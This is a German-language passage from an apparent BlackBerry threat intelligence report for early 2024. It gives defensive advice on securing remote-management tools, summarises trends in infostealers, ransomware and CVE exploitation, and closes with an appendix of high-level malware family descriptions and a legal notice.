  • Identifizierung der derzeit verwendeten RMM-Tools in der Umgebung.
  • Bestätigen Sie, dass sie in der Umgebung zugelassen sind.
  • Wenn Sie mehrere RMM-Tools verwenden, prüfen Sie, ob diese konsolidiert werden können. Durch die Reduzierung der Anzahl der verschiedenen Tools wird das Risiko verringert.

Deaktivieren von Ports und Protokollen

  • Blockieren Sie die ein- und ausgehende Netzwerkkommunikation zu häufig verwendeten Ports, die mit nicht zugelassenen Fernzugriffstools verbunden sind.

Protokolle routinemäßig prüfen

  • Erkennung der anormalen Verwendung von Fernzugriffstools.

Patching

  • Regelmäßige Überprüfung der mit den verwendeten RMM-Tools verbundenen Schwachstellen und ggf. Aktualisierung.
  • Über das Internet zugängliche Software wie RMM-Tools sollten bei der Durchführung regelmäßiger Patch-Zyklen stets hohe Priorität haben. 

Segmentierung des Netzes

  • Minimieren Sie seitliche Bewegungen, indem Sie das Netzwerk segmentieren und den Zugriff auf Geräte und Daten beschränken.

Gerätekennzeichnung

  • Finden Sie heraus, ob Ihr Sicherheitsanbieter Optionen zur Kennzeichnung von Geräten anbietet, die RMM-Tools verwenden. Wenn ja, aktivieren Sie dies, um sicherzustellen, dass das SOC Einblick hat. Einige Anbieter bieten die Möglichkeit, eine Notiz/Markierung zu hinterlassen, die genehmigte Tools/Aktivitäten identifiziert, was Analysten bei Untersuchungen sehr hilft.

Speicher-Laden RMM

  • Verwenden Sie Sicherheitssoftware, die Fernzugriffe erkennen kann, die nur im Speicher geladen werden.

Schlussfolgerung

Dieser 90-Tage-Bericht soll Ihnen helfen, auf dem Laufenden zu bleiben und auf künftige Bedrohungen vorbereitet zu sein. Angesichts der sich schnell verändernden Bedrohungslandschaft im Bereich der Cybersicherheit ist es hilfreich, sich über die neuesten Sicherheitsnachrichten für Ihre Branche, geografische Region und die wichtigsten Themen auf dem Laufenden zu halten. Hier sind unsere wichtigsten Erkenntnisse für Januar bis März 2024:

  • Weltweit stoppte BlackBerry 37.000 Angriffe pro Tag, die sich gegen unsere Kunden richteten, wie unsere interne Telemetrie zu gestoppten Angriffen zeigt. Wir haben einen starken Anstieg der einzelnen Schadprogramme festgestellt, die auf unsere Mieter und Kunden abzielen, und zwar um 40 Prozent pro Minute im Vergleich zum vorherigen Berichtszeitraum. Dies könnte darauf hindeuten, dass Bedrohungsakteure umfangreiche Maßnahmen ergreifen, um ihre Opfer gezielt anzugreifen.
  • Infostealer waren in unseren Abschnitten über kritische Infrastrukturen, kommerzielle Unternehmen und Top-Bedrohungen sehr präsent. Dies deutet darauf hin, dass sensible und private Daten von Bedrohungsakteuren in allen geografischen Regionen und Branchen sehr begehrt sind.
  • Wie in unserem neuen Abschnitt über Ransomware, der die wichtigsten Ransomware-Gruppen beschreibt, hervorgehoben wird,zielt Ransomwarezunehmend auf kritische Infrastrukturen ab, insbesondere auf das Gesundheitswesen.
  • Die Ausnutzung von CVEs hat sich im letzten Jahr rapide ausgeweitet und wird sich fortsetzen. BlackBerry verzeichnete in den letzten drei Monaten fast 9.000 neue CVEs, die vom NIST veröffentlicht wurden. Darüber hinaus wurden mehr als 56 Prozent dieser offengelegten Schwachstellen mit einem Schweregrad von über 7,0 bewertet. Sicherheitslücken im Zusammenhang mit stark genutzter legitimer Software wie ConnectWise ScreenConnect, GoAnywhere und mehreren echten Ivanti-Produkten wurden von Bedrohungsakteuren in alarmierendem Ausmaß ausgenutzt, um eine ganze Reihe von Schadprogrammen auf nicht gepatchte Opferrechner zu übertragen.
  • Politische Täuschungen durch Deepfakes und Fehlinformationen verbreiten sich zunehmend über soziale Medien und werden auch in Zukunft ein Problem darstellen, insbesondere im Zusammenhang mit der russischen Invasion in der Ukraine, dem sich anbahnenden Nahostkonflikt und den bevorstehenden US-Präsidentschaftswahlen im November.

Weitere Informationen über die wichtigsten Bedrohungen für die Cybersicherheit und deren Abwehrmöglichkeiten finden Sie im BlogBlackBerry .

Danksagung

Dieser Bericht ist das Ergebnis der gemeinsamen Bemühungen unserer talentierten Teams und Einzelpersonen. Insbesondere möchten wir folgenden Personen unsere Anerkennung aussprechen:

Anhang: Bedrohungen für kritische Infrastrukturen und Wirtschaftsunternehmen

8Base Ransomware: Eine besonders aggressive Ransomware-Gruppe, die erstmals im Jahr 2023 auftrat. In ihrer kurzen Geschichte war sie äußerst aktiv und hatte es häufig auf Opfer in Nordamerika und den LATAM-Ländern abgesehen. Die Bedrohungsgruppe nutzt eine Mischung aus verschiedenen Taktiken, um sich zunächst Zugang zu verschaffen, und kann dann auch Schwachstellen in den Systemen der Opfer ausnutzen, um ihre potenzielle Auszahlung zu maximieren.

Amadey (Amadey Bot): Ein multifunktionales Botnet mit modularem Aufbau. Sobald es auf dem Gerät eines Opfers gelandet ist, kann Amadey Befehle von seinen C2-Servern empfangen, um verschiedene Aufgaben auszuführen, nämlich Informationen zu stehlen und zusätzliche Nutzlasten zu verteilen.

Buhti: Buhti ist eine relativ neue Ransomware-Operation, die Varianten der geleakten Ransomware-Familien LockBit 3.0 (auch bekannt als LockBit Black) und Babuk verwendet, um Windows- und Linux-Systeme anzugreifen. Darüber hinaus ist bekannt, dass Buhti ein benutzerdefiniertes, in der Programmiersprache Go" geschriebenes Dienstprogramm zur Datenexfiltration verwendet, um Dateien mit bestimmten Erweiterungen zu stehlen. Die Ransomware-Betreiber haben auch schon andere schwerwiegende Fehler ausgenutzt, die sich auf die Dateiaustauschanwendung Aspera Faspex von IBM (CVE-2022-47986) und die kürzlich gepatchte Sicherheitslücke PaperCut (CVE-2023-27350) auswirken.

LummaStealer (LummaC2): C-basierter Infostealer, der auf kommerzielle Unternehmen und kritische Infrastrukturen abzielt und sich darauf konzentriert, private und sensible Daten vom Gerät des Opfers zu exfiltrieren. Dieser Infostealer wird häufig über Untergrundforen und Telegram-Gruppen beworben und verbreitet und stützt sich bei seiner Verbreitung auf Trojaner und Spam.

PrivateLoader: Eine berüchtigte Downloader-Familie, die sich seit 2021 in freier Wildbahn befindet und vor allem auf kommerzielle Unternehmen in Nordamerika abzielt. PrivateLoader (wie der Name schon sagt) ist ein Mechanismus für den Erstzugang, der es ermöglicht, eine Vielzahl bösartiger Nutzdaten auf die Geräte der Opfer, insbesondere Infostealer, zu bringen. PrivateLoader betreibt ein Vertriebsnetz über einen unterirdischen Pay-per-Install (PPI)-Service, um seine weitere Nutzung und Entwicklung zu finanzieren.

RaccoonStealer: MaaS Infostealer. Der RaccoonStealer ist seit 2019 in freier Wildbahn und hat seine Fähigkeiten verbessert, Sicherheitssoftware und herkömmliche AV-Software zu umgehen. Laut der internen Telemetrie von BlackBerrywurde RaccoonStealer dabei beobachtet, wie er kommerzielle Unternehmen in Nordamerika angriff.

RedLine (RedLine Stealer): Ein weit verbreiteter Malware-Infostealer, der häufig über MaaS verkauft wird. Das Hauptmotiv der Bedrohungsgruppe, die die Malware verbreitet, scheint hauptsächlich finanzieller Gewinn und nicht Politik, Zerstörung oder Spionage zu sein. Aus diesem Grund hat RedLine aktiv eine Reihe von Branchen und geografischen Regionen ins Visier genommen.

Remcos (RemcosRAT): Ein kommerzieller RAT, der zur Fernsteuerung eines Computers oder Geräts verwendet wird. Obwohl als legitime Software beworben, wurde die Fernsteuerungs- und Überwachungssoftware oft als Fernzugriffstrojaner verwendet.

SmokeLoader: Eine weit verbreitete Malware mit einer Fülle von Fähigkeiten, insbesondere der Verbreitung anderer Malware auf dem Gerät des Opfers. SmokeLoader ist eine wiederkehrende Bedrohung, die von BlackBerry in mehreren Global Threat Intelligence Reports beobachtet wurde. In diesem Berichtszeitraum wurde die Malware bei kommerziellen und professionellen Dienstleistungen in Nordamerika beobachtet.

Vidar (VidarStealer): Ein Commodity-Infostealer, der sich seit 2018 in freier Wildbahn befindet und sich zu einer stark bewaffneten Malware-Familie entwickelt hat. Angreifer konnten Vidar bereitstellen, indem sie Schwachstellen in der beliebten ScreenConnect RRM-Software von ConnectWise ausnutzten. Diese beiden CVEs, CVE-2024-1708 und CVE-2024-1709, ermöglichten es Bedrohungsakteuren, kritische Systeme zu umgehen und darauf zuzugreifen.

Rechtlicher Hinweis

Die im BlackBerry Global Threat Intelligence Report enthaltenen Informationen dienen nur zu Informationszwecken. BlackBerry übernimmt keine Garantie oder Verantwortung für die Richtigkeit, Vollständigkeit und Verlässlichkeit von Aussagen oder Untersuchungen Dritter, auf die hier Bezug genommen wird. Die in diesem Bericht enthaltenen Analysen spiegeln das aktuelle Verständnis der verfügbaren Informationen durch unsere Analysten wider und können sich ändern, wenn uns zusätzliche Informationen bekannt werden. Die Leser sind selbst dafür verantwortlich, diese Informationen mit der gebotenen Sorgfalt auf ihr privates und berufliches Leben anzuwenden. BlackBerry duldet keinen böswilligen Gebrauch oder Missbrauch der in diesem Bericht enthaltenen Informationen.